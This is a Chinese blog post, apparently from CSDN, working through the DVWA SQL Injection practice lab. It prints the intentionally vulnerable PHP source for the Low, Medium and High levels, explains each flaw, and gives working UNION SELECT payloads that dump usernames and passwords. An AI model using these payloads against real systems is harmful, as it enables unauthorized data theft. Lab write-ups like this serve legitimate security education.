SQL Injection(回显注入)

最新推荐文章于 2022-10-08 20:18:14 发布
最新推荐文章于 2022-10-08 20:18:14 发布
阅读量162 收藏
点赞数
分类专栏: DVWA 文章标签: mysql
本文链接:https://blog.csdn.net/curryzzb/article/details/115592547
版权

SQL Injection:

  • sql注入

Low:

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";  //sql语句
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

可以看出,Low级别的代码对id并没有进行检查和过滤,存在明显的SQL注入

输入一个单引号,查看报错信息

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

可以看出,在输入的单引号周围有一对单引号包裹,判断是字符型注入

使用order by判断出有两列

接着使用union select 依次爆出数据库名,表名,字段名,最后爆出全部数据

'+union+select+1,(select+group_concat('<br>',user,'--',password))+from+users+#&Submit=Submit#

Medium:

先看下源代码:

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);  
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        //显示值
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

  • mysql_real_escape_string() 函数,转义 SQL 语句中使用的字符串中的特殊字符

    • \x00
    • \n
    • \r
    • \
    • "
    • \x1a

  • 因为使用了特殊字符转义的函数,将引号转义了,所以在输入数据库名和表名的时候,需要将其转为十六进制

  • 并且本关的前端也将id的输入改为了下拉框,限制了输入,可以使用抓包来修改参数提交,使用burp的repeater功能

  • 由于将’和“符号转义了,所以不可以直接写库名和表名了,需要将库名和表名换为十六进制。

步骤:

  • 输入单引号报错,可以判断出是数字型

  • 接着使用order by,有两列

  • 一步步爆数据

  • id=1 union select database(),group_concat(0x3c62723e,user,password) from users #&Submit=Submit

High:

源代码:

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; //这里添加了LIMIT 1,使得结果只能显示一行
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?>
  • mysqli_fetch_assoc() 函数从结果集中取得一行作为关联数组。
  • 由于代码中使用了limit,所以查询时也要使用limit对结果输出做限制 ,或者直接将limit注释掉即可,操作过程与前两关相似,

直接最后一步

'+union+select+1,(select+group_concat('<br>',user,'--',password))+from+users+#&Submit=Submit#

Оrdsh1ne
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Dvwa之sql注入low到impossible级别详解
Cai1010110的博客
10-25 9153
在这里我所使用的的是Windows 10系统,dvwa+phpstudy_pro进行靶场练习,关于dvwa的介绍网上一搜一大把,在这里就不加以介绍了,我还是把实践内容介绍好吧!我从网上搜到各位大神操作步骤进行整理学习。 本文介绍SQL Injection的相关内容,后续内容会在之后的文章继续介绍。 小白学习中...... Low 后端控制代码 后端代码解析 1、isset()函数在...
基于错误回显SQL注入整理
12-14
 用我自己的话来讲,基于错误回显sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。  0x01 用于错误...
dvwa靶场
ing_end的博客
02-26 6205
dvwa靶场 Brute Force (Low) Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。 法一:暴力破解 先随便输一个账号密码不能通过 此时我们进行抓包 通过BP利用字典爆破,得出密码 根据长度的不同可得知password为密码 (medium) 源码分析: <?php if( isset( $_GET[ 'Login' ] ) ) { // Sanitise username input $us
DVWA 之 XSS(stored)存储型XSS
RexHa的博客
10-08 1783
dvwa 存储型XSS
php代码审计【7】存储型xss
司徒荆的博客
06-26 563
php代码审计【7】存储型xss
2017.4.6 公司练习题
foolisheddy
04-18 1216
看源码时,无非就是变量和函数,最多就是还有一些语法
sqlmap 自动化的SQL注入工具
01-01
一个自动化的SQL注入工具 1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 2、完全支持布尔型盲注、时间型盲注、...
select2控件回显方法
09-12
JavaScript 技术: select2控件选择多个数据,以及回显数据的方法 。
关于layui时间回显问题的解决方法
10-16
今天小编就为大家分享一篇关于layui时间回显问题的解决方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
SpringBoot之图片上传与回显
08-18
SpringBoot之图片上传与回显的小Demo,非常适合初学者上手。本人博客也写了关于图片上传与回显的一些细节,大家可以参考。
暴力破解
weixin_44259566的博客
01-09 421
Brute Force 暴力破解一般指穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。 一.low 首先进行代码审计,在DVWA目录下找到Brute Force文件夹,查看它的核心代码。 &lt...
网络安全-靶机dvwa之sql注入Low到High详解(含代码分析)
关注网络安全、云原生安全
10-11 1万+
目录 SQL Injection-LOW Union注入 注入点判断 字段判断 获取数据库名 获取表名 获取列名 获取数据 Error注入 获取表名 获取列名 获取数据 源码解析 主要步骤 漏洞原因 SQL Injection-MIDDLE SQL Injection-HIGH SQL Injection(Blind)-LOW Boolean盲注 获取数据库名 sqlmap 获取数据库名 获取表名 获取列名 获取数据 SQL Injection(Blin.
[实验]csrf dvwa
foolisheddy
03-21 2758
dvwa low 级别测试 源代码 构造链接 dvwa medium 级别测试 源代码 漏洞利用 dvwa high 级别测试 源代码 漏洞利用 dvwa Impossible 级别测试 源代码 漏洞利用 参考list tips 新知识点清单 token php语法 语法作用 短链接 Anti-CSRF token机制 授权与未授权 请求域与Cookie信息所指定的域域dvwa low 级别测试:源
笔记
shy的博客
04-21 340
一句话木马代码分析 <?php $_GET['POST']($_POST['GET'])?>; 故意使用了post和get用来迷惑人 https://127.0.0.1/shy.php?POST=assert 密码:GET 1.php <?php $_GET['a']($_POST['b'])?>; $_Get()he $_POST函数是用来传参数的值的 ...
DVWA(low)
筱阳的博客
11-24 708
Brute Force   第一个是暴力破解   首先看看源代码   &lt;?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pa...
代码审计实战—DWVA-xss-high(存储)
王嘟嘟的博客
10-24 329
0x00 前言 如饥似渴的学习ing。 你可能需要看看这个: 0x01 start 1.黑盒 使用exp &amp;amp;amp;amp;lt;img src=1 onerror=alert(/du/)&amp;amp;amp;amp;gt; 详细请看: https://blog.csdn.net/qq_36869808/article/details/83341443 2. 白盒 关键代码 $message = strip_tags( addslas...
dvwa之sql注入学习(不同级别)
热门推荐
过客璇璇的博客
03-24 4万+
dvwa之sql注入学习(不同级别) 级别:Low 从页面上看到,有一个可以提交查询内容的地方 我们可以通过以下步骤判断这里是否存在注入点 ① 输入1 提交 ②输入1' 提交 ③输入1 and 1=1提交 ④输入1 and 1=2提交 由上可以看出是存在注入点的, 我们猜测sql查询语句是这样的: select First name的列名 a...
DVWA的CSRF全部等级解析
Reset
06-15 1515
目录 0x00 介绍 0x01 low级别 0x02 mediu级别 0x03 high级别 0x04 impossible级别 0x00 介绍 DVWA中有很多账号,这些密码都是md5加密的,解密一下就可以了。因为涉及到两个账号,所以需要了解。 0x01 low级别 先更改一个账户的密码,然后抓包看一下: 可以看到提交的新密码和确认密码都在url的参数中,用的GET方法,有referer的验证。但是这里referer的验证并没有什么用。所以直接构造攻击链接: http://
sql注入如何判断回显
最新发布
04-26
判断SQL注入回显位的方法主要有以下几种: 1. 错误消息:当注入SQL语句存在错误时,数据库可能会返回相应的错误消息。攻击者可以通过观察错误消息来判断是否存在注入漏洞。 2. 布尔盲注:攻击者可以通过构造特定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值